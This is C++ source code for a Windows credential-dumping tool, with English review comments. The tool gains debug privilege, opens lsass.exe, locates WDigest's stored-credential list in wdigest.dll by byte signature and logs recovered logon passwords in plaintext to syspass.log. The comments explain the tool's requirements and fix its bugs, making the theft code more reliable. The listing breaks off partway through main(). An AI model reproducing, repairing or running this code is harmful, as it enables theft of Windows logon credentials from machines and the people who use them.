Reading Windows logon passwords with C++ (limitation: only the machine it runs on). Note on what the listing actually does: it does not guess or "crack" anything — as far as the code shows, it opens lsass.exe, locates the WDigest credential list in wdigest.dll by byte signature, and reads the stored credential data out of lsass memory. That is why it works only locally, needs administrator rights / SeDebugPrivilege, depends on the 32-bit layout of one particular wdigest.dll build, and is expected to fail where LSA protection is enabled or WDigest no longer caches credentials.
.cpp文件
#include "CrackWinPassword.h"
#pragma warning(disable:4996)
#pragma warning(disable:4703)
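/*
 * GetProcessHandleByName: return a PROCESS_ALL_ACCESS handle to the first
 * process whose image file name (the part after the last '\') matches szName
 * case-insensitively, or NULL if none is found, szName is NULL, or ntdll does
 * not export NtQueryInformationProcess.  The caller owns the returned handle
 * and must CloseHandle() it; handles of non-matching processes are closed here.
 *
 * This file uses it to reach lsass.exe.  Opening lsass with PROCESS_ALL_ACCESS
 * requires SeDebugPrivilege (main() calls EnableDebugPrivilege first) and is
 * expected to fail when LSA runs as a protected process (RunAsPPL).
 * NOTE(review): PROCESS_QUERY_INFORMATION | PROCESS_VM_READ is the least
 * privilege needed to read another process's memory; the full mask is kept
 * only because the callers' exact needs are not visible here.
 */
HANDLE GetProcessHandleByName(const CHAR* szName)
{
    /* ProcessImageFileName (class 27) returns a UNICODE_STRING header followed by
     * the NT device path, e.g. "\Device\HarddiskVolume1\Windows\System32\smss.exe".
     * The string is not guaranteed to be NUL-terminated, so use Length, and reach
     * the data through the Buffer field rather than a hard-coded offset of 8,
     * which was only right for 32-bit pointers. */
    typedef struct {
        USHORT Length;         /* byte count, excluding any terminator */
        USHORT MaximumLength;
        PWSTR  Buffer;         /* points into the trailing bytes of our buffer */
    } ImageNameInfo;
    union {
        ImageNameInfo hdr;
        WCHAR raw[MAX_PATH + 0x20]; /* header + path; paths that do not fit just fail the query */
    } info;
    enum {
        ProcessImageFileNameClass = 27,
        /* Highest PID probed.  PIDs are multiples of 4 and on a long-running
         * system routinely exceed the original 10,000 cap, so the bound is
         * raised but still finite.  An EnumProcesses/Toolhelp32 walk would be
         * exact but needs another header. */
        MaxProcessId = 0x20000
    };

    pNTQUERYPROCESSINFORMATION NtQueryInformationProcess =
        (pNTQUERYPROCESSINFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationProcess");
    if (NtQueryInformationProcess == NULL || szName == NULL)
        return NULL;   /* the original would have called through a NULL pointer */

    CHAR szCurrentPath[MAX_PATH];
    for (DWORD dwProcessId = 4; dwProcessId < MaxProcessId; dwProcessId += 4)
    {
        HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
        if (hProcess == NULL)
            continue;   /* no such PID, or access denied (e.g. a protected process) */

        DWORD returnLength = 0;
        /* STATUS_SUCCESS is 0; on any other status the buffer is unusable. */
        if (NtQueryInformationProcess(hProcess, ProcessImageFileNameClass, &info, sizeof(info), &returnLength) == 0
            && info.hdr.Buffer != NULL && info.hdr.Length != 0)
        {
            int cchWide = (int)(info.hdr.Length / sizeof(WCHAR));
            int nBytes = WideCharToMultiByte(CP_ACP, 0, info.hdr.Buffer, cchWide,
                                             szCurrentPath, MAX_PATH - 1, NULL, NULL);
            if (nBytes > 0)
            {
                szCurrentPath[nBytes] = '\0';   /* explicit-length conversion adds no terminator */
                const CHAR* pBaseName = strrchr(szCurrentPath, '\\');
                pBaseName = (pBaseName != NULL) ? pBaseName + 1 : szCurrentPath;
                if (lstrcmpi(szName, pBaseName) == 0)
                    return hProcess;   /* ownership passes to the caller */
            }
        }
        CloseHandle(hProcess);
    }
    return NULL;
}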
//
// Use the ciphertext key-pointer byte signature KeyPointerSign[] to locate the
// address that anchors the ciphertext store inside wdigest.dll
//
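/*
 * GetEncryptListHead: locate, inside wdigest.dll, the global that the rest of
 * this file treats as the head of the stored-credential list in lsass.
 *
 * Scans this process's mapping of wdigest.dll from its base up to the exported
 * SpInstanceInit for the LAST occurrence of KeyPointerSign and returns the
 * 4 bytes immediately before that match, interpreted as an absolute address
 * (an x86 instruction immediate).  NOTE(review): this only holds for a 32-bit
 * build; on x64 the operand would be RIP-relative and a 4-byte read is wrong.
 *
 * Returns NULL when wdigest.dll cannot be loaded, SpInstanceInit is not
 * exported, or the signature never matches.  The original fell through in the
 * last case and read the 4 bytes before the module base as if they were the
 * answer.
 *
 * The returned value is an address taken from this process's view of the DLL;
 * it is only meaningful inside lsass if wdigest.dll is mapped at the same base
 * there, which ASLR normally gives within one boot session but does not
 * guarantee.  The DLL is unloaded before returning, so the value must not be
 * dereferenced locally.
 */
LPVOID GetEncryptListHead()
{
    HINSTANCE hModWdigest = LoadLibrary("wdigest.dll");
    if (hModWdigest == NULL)
        return NULL;

    LPVOID result = NULL;
    PBYTE scanEnd = (PBYTE)GetProcAddress(hModWdigest, "SpInstanceInit");
    if (scanEnd != NULL)
    {
        /* Walk every match up to SpInstanceInit and keep the last one, as the
         * original loop did; SearchBytes is assumed to return NULL on no match
         * (the original tested for that). */
        PBYTE lastMatch = NULL;
        PBYTE cursor = (PBYTE)hModWdigest;
        for (;;)
        {
            PBYTE next = (PBYTE)SearchBytes(cursor + sizeof(KeyPointerSign),
                                            scanEnd,
                                            KeyPointerSign,
                                            sizeof(KeyPointerSign));
            if (next == NULL || next >= scanEnd)
                break;
            lastMatch = next;
            cursor = next;
        }

        /* The immediate precedes the signature; make sure it lies inside the image. */
        if (lastMatch != NULL && lastMatch - sizeof(DWORD) >= (PBYTE)hModWdigest)
        {
            DWORD addr;
            memcpy(&addr, lastMatch - sizeof(DWORD), sizeof(addr));   /* unaligned-safe */
            result = (LPVOID)(ULONG_PTR)addr;
        }
    }

    FreeLibrary(hModWdigest);
    return result;
}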
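/*
 * k8writeTxt: append logtext (a NUL-terminated string) to "syspass.log" in the
 * current directory.  Nothing is written for a NULL or empty string.  fopen,
 * fwrite and fclose failures are reported on stderr instead of being ignored:
 * the original called fclose(NULL) when the file could not be opened and
 * never noticed a short write.
 *
 * Security note: the rest of this program (not all visible here) appears to
 * record recovered credentials through this function, so the file holds
 * plaintext secrets.  It is created with default permissions wherever the
 * tool is run from; the operator must restrict and delete it.
 */
void k8writeTxt(char* logtext)
{
    if (logtext == NULL || *logtext == '\0')
        return;

    /* Append-only; the read side of the original "a+" was never used. */
    FILE* pFile = fopen("syspass.log", "a");
    if (pFile == NULL)
    {
        perror("syspass.log");
        return;
    }

    /* strlen, not sizeof: sizeof on a char* is the pointer size, not the text length. */
    size_t len = strlen(logtext);
    if (fwrite(logtext, 1, len, pFile) != len)
        perror("syspass.log: fwrite");

    /* fclose flushes buffered data; it does not write any terminator. */
    if (fclose(pFile) != 0)
        perror("syspass.log: fclose");
}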
int main()
{
//DWORD LogonSessionCount, i, dwBytesRead;
//PLUID LogonSessionList, pCurLUID, pListLUID;
BYTE EncryptBuf[0x200];
//调节进程权限
if (FALSE == EnableDebugPrivilege())
{
printf("调整进程权限失败.错误代码:%d\n", GetLastError